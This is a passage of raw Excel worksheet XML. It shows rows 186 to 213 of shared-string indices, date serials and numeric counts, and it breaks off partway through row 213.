    <row r="186" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A186" t="s">
        <v>4</v>
      </c>
      <c r="B186">
        <v>44509.006856018517</v>
      </c>
      <c r="C186" t="s">
        <v>1769</v>
      </c>
      <c r="D186">
        <v>150</v>
      </c>
      <c r="E186" t="s">
        <v>1784</v>
      </c>
      <c r="F186">
        <v>210</v>
      </c>
      <c r="G186" t="s">
        <v>1785</v>
      </c>
      <c r="H186" t="s">
        <v>1786</v>
      </c>
      <c r="I186" t="s">
        <v>82</v>
      </c>
      <c r="J186" t="s">
        <v>744</v>
      </c>
      <c r="K186" t="s">
        <v>24</v>
      </c>
      <c r="L186" t="s">
        <v>83</v>
      </c>
      <c r="M186" t="s">
        <v>72</v>
      </c>
      <c r="O186" t="s">
        <v>1773</v>
      </c>
      <c r="Q186" t="s">
        <v>3565</v>
      </c>
      <c r="R186">
        <v>11</v>
      </c>
      <c r="S186">
        <v>20</v>
      </c>
      <c r="T186">
        <v>11</v>
      </c>
      <c r="U186">
        <v>3</v>
      </c>
      <c r="V186">
        <v>6</v>
      </c>
      <c r="W186" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="187" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A187" t="s">
        <v>4</v>
      </c>
      <c r="B187">
        <v>44434.51964283565</v>
      </c>
      <c r="C187" t="s">
        <v>1769</v>
      </c>
      <c r="D187">
        <v>150</v>
      </c>
      <c r="E187" t="s">
        <v>1787</v>
      </c>
      <c r="F187">
        <v>131</v>
      </c>
      <c r="G187" t="s">
        <v>1788</v>
      </c>
      <c r="H187" t="s">
        <v>1789</v>
      </c>
      <c r="I187" t="s">
        <v>82</v>
      </c>
      <c r="J187" t="s">
        <v>744</v>
      </c>
      <c r="K187" t="s">
        <v>24</v>
      </c>
      <c r="L187" t="s">
        <v>83</v>
      </c>
      <c r="M187" t="s">
        <v>72</v>
      </c>
      <c r="O187" t="s">
        <v>1790</v>
      </c>
      <c r="Q187" t="s">
        <v>3565</v>
      </c>
      <c r="R187">
        <v>7338</v>
      </c>
      <c r="S187">
        <v>10142</v>
      </c>
      <c r="T187">
        <v>5228</v>
      </c>
      <c r="U187">
        <v>4926</v>
      </c>
      <c r="V187">
        <v>5292</v>
      </c>
      <c r="W187" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="188" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A188" t="s">
        <v>4</v>
      </c>
      <c r="B188">
        <v>44274.679742268519</v>
      </c>
      <c r="C188" t="s">
        <v>2142</v>
      </c>
      <c r="D188">
        <v>112</v>
      </c>
      <c r="E188" t="s">
        <v>2143</v>
      </c>
      <c r="F188">
        <v>112</v>
      </c>
      <c r="G188" t="s">
        <v>1669</v>
      </c>
      <c r="H188" t="s">
        <v>2144</v>
      </c>
      <c r="I188" t="s">
        <v>31</v>
      </c>
      <c r="J188" t="s">
        <v>262</v>
      </c>
      <c r="K188" t="s">
        <v>31</v>
      </c>
      <c r="L188" t="s">
        <v>77</v>
      </c>
      <c r="M188" t="s">
        <v>262</v>
      </c>
      <c r="N188" t="s">
        <v>263</v>
      </c>
      <c r="Q188" t="s">
        <v>3566</v>
      </c>
      <c r="R188">
        <v>83189</v>
      </c>
      <c r="S188">
        <v>86211</v>
      </c>
      <c r="T188">
        <v>67132</v>
      </c>
      <c r="U188">
        <v>77246</v>
      </c>
      <c r="V188">
        <v>106431</v>
      </c>
      <c r="W188" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="189" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A189" t="s">
        <v>4</v>
      </c>
      <c r="B189">
        <v>44655.603482025464</v>
      </c>
      <c r="C189" t="s">
        <v>2241</v>
      </c>
      <c r="D189">
        <v>100</v>
      </c>
      <c r="E189" t="s">
        <v>2242</v>
      </c>
      <c r="F189">
        <v>100</v>
      </c>
      <c r="G189" t="s">
        <v>2243</v>
      </c>
      <c r="H189" t="s">
        <v>1074</v>
      </c>
      <c r="I189" t="s">
        <v>75</v>
      </c>
      <c r="J189" t="s">
        <v>236</v>
      </c>
      <c r="K189" t="s">
        <v>29</v>
      </c>
      <c r="L189" t="s">
        <v>83</v>
      </c>
      <c r="M189" t="s">
        <v>72</v>
      </c>
      <c r="Q189" t="s">
        <v>1406</v>
      </c>
      <c r="T189">
        <v>1</v>
      </c>
      <c r="W189" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="190" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A190" t="s">
        <v>4</v>
      </c>
      <c r="B190">
        <v>44655.603482037041</v>
      </c>
      <c r="C190" t="s">
        <v>2241</v>
      </c>
      <c r="D190">
        <v>100</v>
      </c>
      <c r="E190" t="s">
        <v>2244</v>
      </c>
      <c r="F190">
        <v>100</v>
      </c>
      <c r="G190" t="s">
        <v>2245</v>
      </c>
      <c r="H190" t="s">
        <v>1074</v>
      </c>
      <c r="I190" t="s">
        <v>75</v>
      </c>
      <c r="J190" t="s">
        <v>236</v>
      </c>
      <c r="K190" t="s">
        <v>29</v>
      </c>
      <c r="L190" t="s">
        <v>83</v>
      </c>
      <c r="M190" t="s">
        <v>72</v>
      </c>
      <c r="Q190" t="s">
        <v>1406</v>
      </c>
      <c r="T190">
        <v>2</v>
      </c>
      <c r="W190" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="191" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A191" t="s">
        <v>4</v>
      </c>
      <c r="B191">
        <v>44655.627096875003</v>
      </c>
      <c r="C191" t="s">
        <v>2246</v>
      </c>
      <c r="D191">
        <v>100</v>
      </c>
      <c r="E191" t="s">
        <v>2247</v>
      </c>
      <c r="F191">
        <v>100</v>
      </c>
      <c r="G191" t="s">
        <v>2248</v>
      </c>
      <c r="H191" t="s">
        <v>2249</v>
      </c>
      <c r="I191" t="s">
        <v>75</v>
      </c>
      <c r="J191" t="s">
        <v>236</v>
      </c>
      <c r="K191" t="s">
        <v>29</v>
      </c>
      <c r="L191" t="s">
        <v>83</v>
      </c>
      <c r="M191" t="s">
        <v>72</v>
      </c>
      <c r="Q191" t="s">
        <v>1406</v>
      </c>
      <c r="T191">
        <v>7</v>
      </c>
      <c r="V191">
        <v>1</v>
      </c>
      <c r="W191" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="192" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A192" t="s">
        <v>4</v>
      </c>
      <c r="B192">
        <v>44655.627096886572</v>
      </c>
      <c r="C192" t="s">
        <v>2246</v>
      </c>
      <c r="D192">
        <v>100</v>
      </c>
      <c r="E192" t="s">
        <v>2250</v>
      </c>
      <c r="F192">
        <v>100</v>
      </c>
      <c r="G192" t="s">
        <v>2251</v>
      </c>
      <c r="H192" t="s">
        <v>2252</v>
      </c>
      <c r="I192" t="s">
        <v>75</v>
      </c>
      <c r="J192" t="s">
        <v>236</v>
      </c>
      <c r="K192" t="s">
        <v>29</v>
      </c>
      <c r="L192" t="s">
        <v>83</v>
      </c>
      <c r="M192" t="s">
        <v>72</v>
      </c>
      <c r="Q192" t="s">
        <v>1406</v>
      </c>
      <c r="T192">
        <v>175</v>
      </c>
      <c r="U192">
        <v>56</v>
      </c>
      <c r="W192" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="193" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A193" t="s">
        <v>4</v>
      </c>
      <c r="B193">
        <v>44655.421492361114</v>
      </c>
      <c r="C193" t="s">
        <v>2253</v>
      </c>
      <c r="D193">
        <v>100</v>
      </c>
      <c r="E193" t="s">
        <v>2254</v>
      </c>
      <c r="F193">
        <v>100</v>
      </c>
      <c r="G193" t="s">
        <v>2255</v>
      </c>
      <c r="H193" t="s">
        <v>2256</v>
      </c>
      <c r="I193" t="s">
        <v>75</v>
      </c>
      <c r="J193" t="s">
        <v>236</v>
      </c>
      <c r="K193" t="s">
        <v>29</v>
      </c>
      <c r="L193" t="s">
        <v>83</v>
      </c>
      <c r="M193" t="s">
        <v>72</v>
      </c>
      <c r="Q193" t="s">
        <v>1406</v>
      </c>
      <c r="W193" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="194" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A194" t="s">
        <v>4</v>
      </c>
      <c r="B194">
        <v>44655.421492384259</v>
      </c>
      <c r="C194" t="s">
        <v>2253</v>
      </c>
      <c r="D194">
        <v>100</v>
      </c>
      <c r="E194" t="s">
        <v>2257</v>
      </c>
      <c r="F194">
        <v>100</v>
      </c>
      <c r="G194" t="s">
        <v>2258</v>
      </c>
      <c r="H194" t="s">
        <v>2259</v>
      </c>
      <c r="I194" t="s">
        <v>75</v>
      </c>
      <c r="J194" t="s">
        <v>236</v>
      </c>
      <c r="K194" t="s">
        <v>29</v>
      </c>
      <c r="L194" t="s">
        <v>83</v>
      </c>
      <c r="M194" t="s">
        <v>72</v>
      </c>
      <c r="Q194" t="s">
        <v>1406</v>
      </c>
      <c r="T194">
        <v>348</v>
      </c>
      <c r="U194">
        <v>108</v>
      </c>
      <c r="W194" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="195" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A195" t="s">
        <v>4</v>
      </c>
      <c r="B195">
        <v>44441.927696087965</v>
      </c>
      <c r="C195" t="s">
        <v>2260</v>
      </c>
      <c r="D195">
        <v>110</v>
      </c>
      <c r="E195" t="s">
        <v>2261</v>
      </c>
      <c r="F195">
        <v>110</v>
      </c>
      <c r="G195" t="s">
        <v>2262</v>
      </c>
      <c r="H195" t="s">
        <v>2263</v>
      </c>
      <c r="I195" t="s">
        <v>75</v>
      </c>
      <c r="J195" t="s">
        <v>236</v>
      </c>
      <c r="K195" t="s">
        <v>29</v>
      </c>
      <c r="L195" t="s">
        <v>83</v>
      </c>
      <c r="M195" t="s">
        <v>72</v>
      </c>
      <c r="O195" t="s">
        <v>2264</v>
      </c>
      <c r="Q195" t="s">
        <v>3567</v>
      </c>
      <c r="R195">
        <v>12158107</v>
      </c>
      <c r="S195">
        <v>11019709</v>
      </c>
      <c r="T195">
        <v>10110539</v>
      </c>
      <c r="U195">
        <v>10245697</v>
      </c>
      <c r="V195">
        <v>11407036</v>
      </c>
      <c r="W195" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="196" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A196" t="s">
        <v>4</v>
      </c>
      <c r="B196">
        <v>44099.490264282409</v>
      </c>
      <c r="C196" t="s">
        <v>2266</v>
      </c>
      <c r="D196">
        <v>101</v>
      </c>
      <c r="E196" t="s">
        <v>2267</v>
      </c>
      <c r="F196">
        <v>101</v>
      </c>
      <c r="G196" t="s">
        <v>2268</v>
      </c>
      <c r="H196" t="s">
        <v>2269</v>
      </c>
      <c r="I196" t="s">
        <v>31</v>
      </c>
      <c r="J196" t="s">
        <v>262</v>
      </c>
      <c r="K196" t="s">
        <v>31</v>
      </c>
      <c r="L196" t="s">
        <v>77</v>
      </c>
      <c r="M196" t="s">
        <v>262</v>
      </c>
      <c r="N196" t="s">
        <v>263</v>
      </c>
      <c r="O196" t="s">
        <v>111</v>
      </c>
      <c r="Q196" t="s">
        <v>2270</v>
      </c>
      <c r="R196">
        <v>2246</v>
      </c>
      <c r="S196">
        <v>1721</v>
      </c>
      <c r="T196">
        <v>1861</v>
      </c>
      <c r="U196">
        <v>1804</v>
      </c>
      <c r="V196">
        <v>2007</v>
      </c>
      <c r="W196" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="197" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A197" t="s">
        <v>4</v>
      </c>
      <c r="B197">
        <v>44441.431199270832</v>
      </c>
      <c r="C197" t="s">
        <v>2275</v>
      </c>
      <c r="D197">
        <v>101</v>
      </c>
      <c r="E197" t="s">
        <v>2276</v>
      </c>
      <c r="F197">
        <v>101</v>
      </c>
      <c r="G197" t="s">
        <v>2277</v>
      </c>
      <c r="H197" t="s">
        <v>2278</v>
      </c>
      <c r="I197" t="s">
        <v>172</v>
      </c>
      <c r="J197" t="s">
        <v>173</v>
      </c>
      <c r="K197" t="s">
        <v>13</v>
      </c>
      <c r="L197" t="s">
        <v>83</v>
      </c>
      <c r="M197" t="s">
        <v>72</v>
      </c>
      <c r="N197" t="s">
        <v>522</v>
      </c>
      <c r="Q197" t="s">
        <v>523</v>
      </c>
      <c r="R197">
        <v>17617</v>
      </c>
      <c r="S197">
        <v>12407</v>
      </c>
      <c r="T197">
        <v>13862</v>
      </c>
      <c r="U197">
        <v>12495</v>
      </c>
      <c r="V197">
        <v>11688</v>
      </c>
      <c r="W197" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="198" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A198" t="s">
        <v>4</v>
      </c>
      <c r="B198">
        <v>44435.729944456019</v>
      </c>
      <c r="C198" t="s">
        <v>2279</v>
      </c>
      <c r="D198">
        <v>122</v>
      </c>
      <c r="E198" t="s">
        <v>2280</v>
      </c>
      <c r="F198">
        <v>102</v>
      </c>
      <c r="G198" t="s">
        <v>2281</v>
      </c>
      <c r="H198" t="s">
        <v>2282</v>
      </c>
      <c r="I198" t="s">
        <v>82</v>
      </c>
      <c r="J198" t="s">
        <v>43</v>
      </c>
      <c r="K198" t="s">
        <v>24</v>
      </c>
      <c r="L198" t="s">
        <v>83</v>
      </c>
      <c r="M198" t="s">
        <v>72</v>
      </c>
      <c r="Q198" t="s">
        <v>3568</v>
      </c>
      <c r="R198">
        <v>121</v>
      </c>
      <c r="S198">
        <v>124</v>
      </c>
      <c r="T198">
        <v>58</v>
      </c>
      <c r="U198">
        <v>54</v>
      </c>
      <c r="V198">
        <v>58</v>
      </c>
      <c r="W198" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="199" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A199" t="s">
        <v>4</v>
      </c>
      <c r="B199">
        <v>44209.75518915509</v>
      </c>
      <c r="C199" t="s">
        <v>2279</v>
      </c>
      <c r="D199">
        <v>122</v>
      </c>
      <c r="E199" t="s">
        <v>2284</v>
      </c>
      <c r="F199">
        <v>101</v>
      </c>
      <c r="G199" t="s">
        <v>2285</v>
      </c>
      <c r="H199" t="s">
        <v>2286</v>
      </c>
      <c r="I199" t="s">
        <v>82</v>
      </c>
      <c r="J199" t="s">
        <v>43</v>
      </c>
      <c r="K199" t="s">
        <v>24</v>
      </c>
      <c r="L199" t="s">
        <v>83</v>
      </c>
      <c r="M199" t="s">
        <v>72</v>
      </c>
      <c r="O199" t="s">
        <v>111</v>
      </c>
      <c r="Q199" t="s">
        <v>3568</v>
      </c>
      <c r="R199">
        <v>6897</v>
      </c>
      <c r="S199">
        <v>5840</v>
      </c>
      <c r="T199">
        <v>4722</v>
      </c>
      <c r="U199">
        <v>4591</v>
      </c>
      <c r="V199">
        <v>4572</v>
      </c>
      <c r="W199" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="200" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A200" t="s">
        <v>4</v>
      </c>
      <c r="B200">
        <v>44435.729944467595</v>
      </c>
      <c r="C200" t="s">
        <v>2279</v>
      </c>
      <c r="D200">
        <v>122</v>
      </c>
      <c r="E200" t="s">
        <v>2287</v>
      </c>
      <c r="F200">
        <v>102</v>
      </c>
      <c r="G200" t="s">
        <v>2288</v>
      </c>
      <c r="H200" t="s">
        <v>2289</v>
      </c>
      <c r="I200" t="s">
        <v>82</v>
      </c>
      <c r="J200" t="s">
        <v>43</v>
      </c>
      <c r="K200" t="s">
        <v>24</v>
      </c>
      <c r="L200" t="s">
        <v>83</v>
      </c>
      <c r="M200" t="s">
        <v>72</v>
      </c>
      <c r="Q200" t="s">
        <v>3568</v>
      </c>
      <c r="W200" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="201" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A201" t="s">
        <v>4</v>
      </c>
      <c r="B201">
        <v>44435.729944409723</v>
      </c>
      <c r="C201" t="s">
        <v>2279</v>
      </c>
      <c r="D201">
        <v>122</v>
      </c>
      <c r="E201" t="s">
        <v>2290</v>
      </c>
      <c r="F201">
        <v>103</v>
      </c>
      <c r="G201" t="s">
        <v>2291</v>
      </c>
      <c r="H201" t="s">
        <v>2292</v>
      </c>
      <c r="I201" t="s">
        <v>82</v>
      </c>
      <c r="J201" t="s">
        <v>43</v>
      </c>
      <c r="K201" t="s">
        <v>24</v>
      </c>
      <c r="L201" t="s">
        <v>83</v>
      </c>
      <c r="M201" t="s">
        <v>72</v>
      </c>
      <c r="Q201" t="s">
        <v>3568</v>
      </c>
      <c r="R201">
        <v>1710</v>
      </c>
      <c r="S201">
        <v>4274</v>
      </c>
      <c r="T201">
        <v>2877</v>
      </c>
      <c r="U201">
        <v>3191</v>
      </c>
      <c r="V201">
        <v>2013</v>
      </c>
      <c r="W201" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="202" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A202" t="s">
        <v>4</v>
      </c>
      <c r="B202">
        <v>44400.387266226855</v>
      </c>
      <c r="C202" t="s">
        <v>2293</v>
      </c>
      <c r="D202">
        <v>100</v>
      </c>
      <c r="E202" t="s">
        <v>2294</v>
      </c>
      <c r="F202">
        <v>100</v>
      </c>
      <c r="G202" t="s">
        <v>2295</v>
      </c>
      <c r="H202" t="s">
        <v>2296</v>
      </c>
      <c r="I202" t="s">
        <v>82</v>
      </c>
      <c r="J202" t="s">
        <v>43</v>
      </c>
      <c r="K202" t="s">
        <v>24</v>
      </c>
      <c r="L202" t="s">
        <v>83</v>
      </c>
      <c r="M202" t="s">
        <v>72</v>
      </c>
      <c r="Q202" t="s">
        <v>1325</v>
      </c>
      <c r="S202">
        <v>8</v>
      </c>
      <c r="T202">
        <v>2</v>
      </c>
      <c r="U202">
        <v>75</v>
      </c>
      <c r="V202">
        <v>92</v>
      </c>
      <c r="W202" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="203" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A203" t="s">
        <v>4</v>
      </c>
      <c r="B203">
        <v>44400.387266215279</v>
      </c>
      <c r="C203" t="s">
        <v>2293</v>
      </c>
      <c r="D203">
        <v>100</v>
      </c>
      <c r="E203" t="s">
        <v>2297</v>
      </c>
      <c r="F203">
        <v>100</v>
      </c>
      <c r="G203" t="s">
        <v>2298</v>
      </c>
      <c r="H203" t="s">
        <v>2299</v>
      </c>
      <c r="I203" t="s">
        <v>82</v>
      </c>
      <c r="J203" t="s">
        <v>43</v>
      </c>
      <c r="K203" t="s">
        <v>24</v>
      </c>
      <c r="L203" t="s">
        <v>83</v>
      </c>
      <c r="M203" t="s">
        <v>72</v>
      </c>
      <c r="Q203" t="s">
        <v>1325</v>
      </c>
      <c r="W203" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="204" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A204" t="s">
        <v>4</v>
      </c>
      <c r="B204">
        <v>44425.802171331015</v>
      </c>
      <c r="C204" t="s">
        <v>2300</v>
      </c>
      <c r="D204">
        <v>111</v>
      </c>
      <c r="E204" t="s">
        <v>2301</v>
      </c>
      <c r="F204">
        <v>111</v>
      </c>
      <c r="G204" t="s">
        <v>2302</v>
      </c>
      <c r="H204" t="s">
        <v>2303</v>
      </c>
      <c r="I204" t="s">
        <v>82</v>
      </c>
      <c r="J204" t="s">
        <v>43</v>
      </c>
      <c r="K204" t="s">
        <v>24</v>
      </c>
      <c r="L204" t="s">
        <v>83</v>
      </c>
      <c r="M204" t="s">
        <v>72</v>
      </c>
      <c r="Q204" t="s">
        <v>3568</v>
      </c>
      <c r="R204">
        <v>88076</v>
      </c>
      <c r="S204">
        <v>160821</v>
      </c>
      <c r="T204">
        <v>94299</v>
      </c>
      <c r="U204">
        <v>86298</v>
      </c>
      <c r="V204">
        <v>74860</v>
      </c>
      <c r="W204" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="205" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A205" t="s">
        <v>4</v>
      </c>
      <c r="B205">
        <v>44434.822725185186</v>
      </c>
      <c r="C205" t="s">
        <v>2304</v>
      </c>
      <c r="D205">
        <v>102</v>
      </c>
      <c r="E205" t="s">
        <v>2305</v>
      </c>
      <c r="F205">
        <v>102</v>
      </c>
      <c r="G205" t="s">
        <v>2306</v>
      </c>
      <c r="H205" t="s">
        <v>2307</v>
      </c>
      <c r="I205" t="s">
        <v>82</v>
      </c>
      <c r="J205" t="s">
        <v>43</v>
      </c>
      <c r="K205" t="s">
        <v>24</v>
      </c>
      <c r="L205" t="s">
        <v>83</v>
      </c>
      <c r="M205" t="s">
        <v>72</v>
      </c>
      <c r="Q205" t="s">
        <v>3569</v>
      </c>
      <c r="R205">
        <v>2527</v>
      </c>
      <c r="S205">
        <v>4084</v>
      </c>
      <c r="T205">
        <v>2396</v>
      </c>
      <c r="U205">
        <v>2598</v>
      </c>
      <c r="V205">
        <v>3968</v>
      </c>
      <c r="W205" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="206" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A206" t="s">
        <v>4</v>
      </c>
      <c r="B206">
        <v>44649.645903877317</v>
      </c>
      <c r="C206" t="s">
        <v>2320</v>
      </c>
      <c r="D206">
        <v>110</v>
      </c>
      <c r="E206" t="s">
        <v>2325</v>
      </c>
      <c r="F206">
        <v>100</v>
      </c>
      <c r="G206" t="s">
        <v>2326</v>
      </c>
      <c r="H206" t="s">
        <v>2327</v>
      </c>
      <c r="I206" t="s">
        <v>179</v>
      </c>
      <c r="J206" t="s">
        <v>180</v>
      </c>
      <c r="K206" t="s">
        <v>575</v>
      </c>
      <c r="L206" t="s">
        <v>77</v>
      </c>
      <c r="M206" t="s">
        <v>1066</v>
      </c>
      <c r="Q206" t="s">
        <v>3570</v>
      </c>
      <c r="T206">
        <v>23</v>
      </c>
      <c r="U206">
        <v>9</v>
      </c>
      <c r="W206" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="207" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A207" t="s">
        <v>4</v>
      </c>
      <c r="B207">
        <v>44474.592447743053</v>
      </c>
      <c r="C207" t="s">
        <v>2320</v>
      </c>
      <c r="D207">
        <v>110</v>
      </c>
      <c r="E207" t="s">
        <v>2329</v>
      </c>
      <c r="F207">
        <v>101</v>
      </c>
      <c r="G207" t="s">
        <v>2330</v>
      </c>
      <c r="H207" t="s">
        <v>2331</v>
      </c>
      <c r="I207" t="s">
        <v>179</v>
      </c>
      <c r="J207" t="s">
        <v>180</v>
      </c>
      <c r="K207" t="s">
        <v>575</v>
      </c>
      <c r="L207" t="s">
        <v>77</v>
      </c>
      <c r="M207" t="s">
        <v>1066</v>
      </c>
      <c r="Q207" t="s">
        <v>3570</v>
      </c>
      <c r="W207" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="208" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A208" t="s">
        <v>4</v>
      </c>
      <c r="B208">
        <v>44588.71479027778</v>
      </c>
      <c r="C208" t="s">
        <v>2332</v>
      </c>
      <c r="D208">
        <v>201</v>
      </c>
      <c r="E208" t="s">
        <v>2333</v>
      </c>
      <c r="F208">
        <v>101</v>
      </c>
      <c r="G208" t="s">
        <v>2334</v>
      </c>
      <c r="H208" t="s">
        <v>2335</v>
      </c>
      <c r="I208" t="s">
        <v>31</v>
      </c>
      <c r="J208" t="s">
        <v>262</v>
      </c>
      <c r="K208" t="s">
        <v>31</v>
      </c>
      <c r="L208" t="s">
        <v>77</v>
      </c>
      <c r="M208" t="s">
        <v>262</v>
      </c>
      <c r="N208" t="s">
        <v>263</v>
      </c>
      <c r="Q208" t="s">
        <v>3571</v>
      </c>
      <c r="R208">
        <v>408</v>
      </c>
      <c r="S208">
        <v>606</v>
      </c>
      <c r="T208">
        <v>767</v>
      </c>
      <c r="U208">
        <v>3512</v>
      </c>
      <c r="V208">
        <v>125382</v>
      </c>
      <c r="W208" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="209" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A209" t="s">
        <v>4</v>
      </c>
      <c r="B209">
        <v>44567.597528530096</v>
      </c>
      <c r="C209" t="s">
        <v>2332</v>
      </c>
      <c r="D209">
        <v>100</v>
      </c>
      <c r="E209" t="s">
        <v>2337</v>
      </c>
      <c r="F209">
        <v>100</v>
      </c>
      <c r="G209" t="s">
        <v>2338</v>
      </c>
      <c r="H209" t="s">
        <v>2339</v>
      </c>
      <c r="I209" t="s">
        <v>31</v>
      </c>
      <c r="J209" t="s">
        <v>262</v>
      </c>
      <c r="K209" t="s">
        <v>31</v>
      </c>
      <c r="L209" t="s">
        <v>77</v>
      </c>
      <c r="M209" t="s">
        <v>262</v>
      </c>
      <c r="N209" t="s">
        <v>263</v>
      </c>
      <c r="Q209" t="s">
        <v>3572</v>
      </c>
      <c r="R209">
        <v>310707</v>
      </c>
      <c r="S209">
        <v>641937</v>
      </c>
      <c r="T209">
        <v>166967</v>
      </c>
      <c r="U209">
        <v>388546</v>
      </c>
      <c r="V209">
        <v>259734</v>
      </c>
      <c r="W209" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="210" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A210" t="s">
        <v>4</v>
      </c>
      <c r="B210">
        <v>44055.653204247683</v>
      </c>
      <c r="C210" t="s">
        <v>2332</v>
      </c>
      <c r="D210">
        <v>201</v>
      </c>
      <c r="E210" t="s">
        <v>2337</v>
      </c>
      <c r="F210">
        <v>200</v>
      </c>
      <c r="G210" t="s">
        <v>2338</v>
      </c>
      <c r="H210" t="s">
        <v>2341</v>
      </c>
      <c r="I210" t="s">
        <v>31</v>
      </c>
      <c r="J210" t="s">
        <v>262</v>
      </c>
      <c r="K210" t="s">
        <v>31</v>
      </c>
      <c r="L210" t="s">
        <v>77</v>
      </c>
      <c r="M210" t="s">
        <v>262</v>
      </c>
      <c r="N210" t="s">
        <v>263</v>
      </c>
      <c r="Q210" t="s">
        <v>3571</v>
      </c>
      <c r="R210">
        <v>310707</v>
      </c>
      <c r="S210">
        <v>641937</v>
      </c>
      <c r="T210">
        <v>166967</v>
      </c>
      <c r="U210">
        <v>388546</v>
      </c>
      <c r="V210">
        <v>259734</v>
      </c>
      <c r="W210" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="211" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A211" t="s">
        <v>4</v>
      </c>
      <c r="B211">
        <v>44588.714790358797</v>
      </c>
      <c r="C211" t="s">
        <v>2332</v>
      </c>
      <c r="D211">
        <v>100</v>
      </c>
      <c r="E211" t="s">
        <v>2342</v>
      </c>
      <c r="F211">
        <v>100</v>
      </c>
      <c r="G211" t="s">
        <v>2343</v>
      </c>
      <c r="H211" t="s">
        <v>2344</v>
      </c>
      <c r="I211" t="s">
        <v>31</v>
      </c>
      <c r="J211" t="s">
        <v>262</v>
      </c>
      <c r="K211" t="s">
        <v>31</v>
      </c>
      <c r="L211" t="s">
        <v>77</v>
      </c>
      <c r="M211" t="s">
        <v>262</v>
      </c>
      <c r="N211" t="s">
        <v>263</v>
      </c>
      <c r="O211" t="s">
        <v>111</v>
      </c>
      <c r="Q211" t="s">
        <v>3572</v>
      </c>
      <c r="R211">
        <v>693129</v>
      </c>
      <c r="S211">
        <v>577177</v>
      </c>
      <c r="T211">
        <v>472980</v>
      </c>
      <c r="U211">
        <v>551060</v>
      </c>
      <c r="V211">
        <v>743811</v>
      </c>
      <c r="W211" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="212" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A212" t="s">
        <v>4</v>
      </c>
      <c r="B212">
        <v>44055.653204212962</v>
      </c>
      <c r="C212" t="s">
        <v>2332</v>
      </c>
      <c r="D212">
        <v>201</v>
      </c>
      <c r="E212" t="s">
        <v>2345</v>
      </c>
      <c r="F212">
        <v>110</v>
      </c>
      <c r="G212" t="s">
        <v>2343</v>
      </c>
      <c r="H212" t="s">
        <v>2344</v>
      </c>
      <c r="I212" t="s">
        <v>31</v>
      </c>
      <c r="J212" t="s">
        <v>262</v>
      </c>
      <c r="K212" t="s">
        <v>31</v>
      </c>
      <c r="L212" t="s">
        <v>77</v>
      </c>
      <c r="M212" t="s">
        <v>262</v>
      </c>
      <c r="N212" t="s">
        <v>263</v>
      </c>
      <c r="O212" t="s">
        <v>111</v>
      </c>
      <c r="Q212" t="s">
        <v>3571</v>
      </c>
      <c r="R212">
        <v>693129</v>
      </c>
      <c r="S212">
        <v>577177</v>
      </c>
      <c r="T212">
        <v>472980</v>
      </c>
      <c r="U212">
        <v>551060</v>
      </c>
      <c r="V212">
        <v>743811</v>
      </c>
      <c r="W212" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="213" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A213" t="s">
        <v>4</v>
      </c>
      <c r="B213">
        <v>44525.495957129628</v>
      </c>
      <c r="C213" t="s">
        <v>1646</v>
      </c>
      <c r="D213">
        <v>100</v>
      </c>
      <c r="E213" t="s">
        <v>2346</v>
      </c>
      <c r="F213">
        <v>100</v>
      </c>
      <c r="G213" t="s">
        <v>2347</v>
      </c>
      <c r="H213" t="s">
        <v>2348</v>
      </c>
      <c r="I213" t="s">
        <v>31</v>
      </c>
      <c r="J213" t="s">
        <v>262</v>
      </c>
      <c r="K213" t="s">
        <v>31</v>
      </c>
      <c r="L213" t="s">
        <v>77</v>
      </c>
      <c r="M213" t="s">
        <v>262</v>
      </c>
      <c r="N213" t="s">
        <v>263</v>
      </c>
      <c r="Q213" t="s">
        <v>3555</v>
      </c>
      <c r="R213">
        <v>205</v>
      </c>
      <c r="S213">
        <v>684</v>
